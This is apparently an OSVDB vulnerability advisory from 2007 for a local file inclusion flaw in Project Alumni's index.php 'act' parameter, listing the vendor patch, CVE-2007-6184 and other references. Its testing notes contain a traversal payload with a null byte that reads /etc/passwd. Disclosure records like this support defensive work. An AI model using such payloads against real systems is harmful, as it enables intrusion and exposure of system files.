Project Alumni index.php act Variable Traversal Local File Inclusion

2007-11-27T00:00:00
ID OSVDB:39673
Type osvdb
Reporter OSVDB
Modified 2007-11-27T00:00:00

Description

Manual Testing Notes

http://[target]/[path]/index.php?act=../../../../../../etc/passwd%00

References:

Vendor URL: https://sourceforge.net/projects/project-alumni/ Vendor Specific News/Changelog Entry: http://downloads.sourceforge.net/project-alumni/security-patch-1.0.9.zip?modtime=1196251519&big_mirror=0</a> Secunia Advisory ID:27820 ISS X-Force ID: 38681 Generic Exploit URL: http://www.milw0rm.com/exploits/4669 CVE-2007-6184 Bugtraq ID: 26612